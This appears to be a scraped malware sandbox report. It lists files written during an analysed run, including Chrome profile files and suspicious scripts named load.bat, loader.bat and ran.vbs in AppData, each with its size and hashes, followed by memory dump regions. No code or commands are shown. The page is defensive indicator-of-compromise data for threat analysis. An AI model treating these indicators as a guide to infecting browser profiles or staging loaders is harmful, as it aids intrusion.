C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.83.1_0\dasherSettingSchema.json

Filesize
854B

MD5
4ec1df2da46182103d2ffc3b92d20ca5

SHA1
fb9d1ba3710cf31a87165317c6edc110e98994ce

SHA256
6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

SHA512
939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
354B

MD5
9d3e8a7f4d7202259fab75858b2f2035

SHA1
22096b1ceb6d3d7dc60eaed1ba6e9a089c83a847

SHA256
06b0d62d6aeb67982f66e5677338249874dbfbfd7f01c2aac22b8a7cd3ae6cec

SHA512
fba33f1c3930a0e0a65fde0c2d32507195c5b22551dc8d063f5ddd14e0d2d71c83f7e578b8367d621ddba49fb9e4e4d47a5e55bcd2ea7f72e346d945ad1cb57f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
354B

MD5
2ec1f3ebf791eb1df53cc6cb4c8d9a03

SHA1
dea271ae60587dd18375f6d18dc09c982fec540a

SHA256
13a7edeab154edf7d6034c40360504daf454076a14f5747cbe37e6dd6c5d5419

SHA512
e7f41bf93c2c528b1b290b61bbd74dc0a8b887a89bc2ea1b78834d1a23d7519c8054b0beaa8f333cc0721aed01d135654455d253a378f0aa92105924ade63721

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
c0a96d6a0c331d97783b0c496bca4244

SHA1
d1a9bd3d661ccbadf640fc748f775ec8cde00ed6

SHA256
c60026ed6130a6db248c14d5c32d2023d0504d34b836b753f5107f90964f6f95

SHA512
18d1d5e25bfe85a5531639a9b7a872f5462ee575be753f11b3ff64db8b29c4218ebfbd04087e53f59633df93a8d5169b05be7b3ffd57248ce92a9664d90861b3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
048603553cbcbdd5e27c2ba8025b2d7b

SHA1
821f7ffe82583869f901428d29a8e425f167b7c7

SHA256
bdb6adcdf8a87bfeb3de7420cfd7015db64b1c610de7e1d86e6cacf45a5f297a

SHA512
1ea469a9eed43af9c83142ec583c30b47b4e430f765a59ceb7a4263926b79d563ff733f9c20ee81c4e85090229b5199d0551cd0fa42edfd856d87e0f2106613b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
bdf3fabdb846f30bbb2bfb0b4b4d0ec4

SHA1
0dc6a80ff16b1cb76a021ce8ff016b985dea9356

SHA256
4358b5f65d6e27eae9a425a8f49714e9f4c5d23f01b2c91de99de0ddd3834d3d

SHA512
2666ad3672f1342d21ee0d8d1d44f402af83a22e8dfc54616e8b8edc4046ab29b11cf7e0beee50733c1888b33dd9d3ddbd43dd16c2f51c791c7388104e8fdee9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
a0d5adb5557df7150a2841d2d2ed4af5

SHA1
155a1965a61404052aa9a1ded79aa9798919b838

SHA256
fb0b58d4ddb2ffeedf47e4ca6f0027f6e152d3ac23a63531a727729339b42ee8

SHA512
cd4fe58cbdcfced48853f7d62776f894fa149bee300063f2a7c7e218bb6fbb0fe0f02a5581579540603a4caefc35a3be2837d867db3bb3bf95aec89fd5a56b07

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
80f704b23aa4dcd94560a43a9180679b

SHA1
27e5e1c80dd77b5649b95767f385ff1a380f4ca7

SHA256
e5b15fcc81864ceddb6293e89b3f4ef886d9cc7ef10653e52520ccb458dee04e

SHA512
05bfbda79c4187caa3cb05ca86ac9065b406e2bfaeb95df135d4e8242eac7bdd54878b1e825133cdf38394cef791fee6448a050c45af12e6d08e7d15d7fac44b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
f5b8846446074b082d8d6e962a013d96

SHA1
81b653fbf6ddff62f5f5d5c9881753c0552ca52d

SHA256
ed506446c538d5f00e7b158a9a8d8eb587d72259c7b4b0c4171c0a17d555f072

SHA512
2abfb6daacfcb3e0c587d812b69acdc6dddbc106d33f9f9a5d37651c435f6592edffa7ab6b7b1a1485670c9ad41b5790c5e3d659fdae8f39cef723e9f87497d1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
232KB

MD5
dbb14414b7830740d59648516a35b45e

SHA1
0335a3ad3d5f3fd24ceecc2cd2e5c37d26cd66c1

SHA256
1911031fbf3949e2136d188a41a361fe5a8c518f3b9aa2a538a7b3751b53f290

SHA512
957fcb7d7fe0837c10d7d93f5e603f0a9c837f8eb2d30ba0f140e3336fdf2f948fb6f35c1771132aeee688b41a1fe553f2add6bb1241691de1864a91a23be171

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
232KB

MD5
0bf6f39b391380b3d9ba66c9d981bf76

SHA1
8fa0714699f302b627b0dba9128e6b38d91f2df1

SHA256
2a027f919756fb1fadfebc107b6aff8a74c3272a7c5a8467b34ca1cb641ef9e7

SHA512
55c9f7e3ddc212a520d8e119e0792f5467a91f56debf61265cd16ae77601204eaabc1d4298e595660cfe8f939d2131c119174cdc33624c884d89f84dc37f1640

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d0wgk1n5.3d1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir4092_1589376359\459f00fc-ba8d-442e-aaac-ff749595f5ea.tmp

Filesize
132KB

MD5
da75bb05d10acc967eecaac040d3d733

SHA1
95c08e067df713af8992db113f7e9aec84f17181

SHA256
33ae9b8f06dc777bb1a65a6ba6c3f2a01b25cd1afc291426b46d1df27ea6e7e2

SHA512
56533de53872f023809a20d1ea8532cdc2260d40b05c5a7012c8e61576ff092f006a197f759c92c6b8c429eeec4bb542073b491ddcfd5b22cd4ecbe1a8a7c6ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir4092_1589376359\CRX_INSTALL\_locales\en_CA\messages.json

Filesize
711B

MD5
558659936250e03cc14b60ebf648aa09

SHA1
32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825

SHA256
2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b

SHA512
1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

Download Submit
C:\Users\Admin\AppData\Roaming\load.bat

Filesize
1KB

MD5
cf08811b97cdd3d57685a7841a40e2d4

SHA1
faefa9b229e81eef5d200799c39b5db5511922d2

SHA256
7f27ffda0644c500961f965c6f403f54c41c6df7fb685020cf98f7be6fd5082c

SHA512
695e45bc85be611ca90e92ff5502a707e6ec298f31b6113be2537be78beda222d52751f090b0dda752e2880ac08c62c6d80f4fdd371b2721f1c728d9ebd1002a

Download Submit
C:\Users\Admin\AppData\Roaming\loader.bat

Filesize
291KB

MD5
d05f7937bc9eef5bf3042a8a2ecd2f08

SHA1
15230c5d5506e80ac6cecd06a21bea1a44aeef08

SHA256
b981829c3b1026c432c08bc8a65bc1a848750596e01a065bcacef49c128f7226

SHA512
42954c12e551ff742ab466b416f805d93632cafab1bd2c825b16dcb4f838d7914e61e84cf46744d081d0e6424a3afd335cd169cf8e9c0b6d83733f45eba71c95

Download Submit
C:\Users\Admin\AppData\Roaming\ran.vbs

Filesize
4KB

MD5
f5ccab008d4557e0d9d29bdd94a31d49

SHA1
bea6b9855c0c5ee998f6d954ab39650b22dfd8fb

SHA256
087b721c29fc58f91b7f82c664569b5d61283997ba44030a09fb56cbdccc1609

SHA512
4521abb852f46a8d57b59eaff9d3fd257834da44db5e3cbea5fc511db89f90caa29fa2568c26c5b52e6c0f3464ea61f43f4a6b6782229a193156218623efb368

Download Submit
memory/1208-37-0x000001A87C500000-0x000001A87C50E000-memory.dmp

Filesize
56KB

Download
memory/1208-26-0x000001A87BC80000-0x000001A87BCB8000-memory.dmp

Filesize
224KB

Download
memory/1208-25-0x000001A8796B0000-0x000001A8796B8000-memory.dmp

Filesize
32KB

Download
memory/1208-17-0x000001A879830000-0x000001A879852000-memory.dmp

Filesize
136KB

Download
memory/1208-27-0x000001A87BCE0000-0x000001A87BCF6000-memory.dmp

Filesize
88KB

Download
memory/1208-34-0x000001A8796A0000-0x000001A8796AC000-memory.dmp

Filesize
48KB

Download
memory/3724-0-0x00007FF857523000-0x00007FF857525000-memory.dmp

Filesize
8KB

Download
memory/3724-1-0x0000000000AC0000-0x0000000000B14000-memory.dmp

Filesize
336KB

Download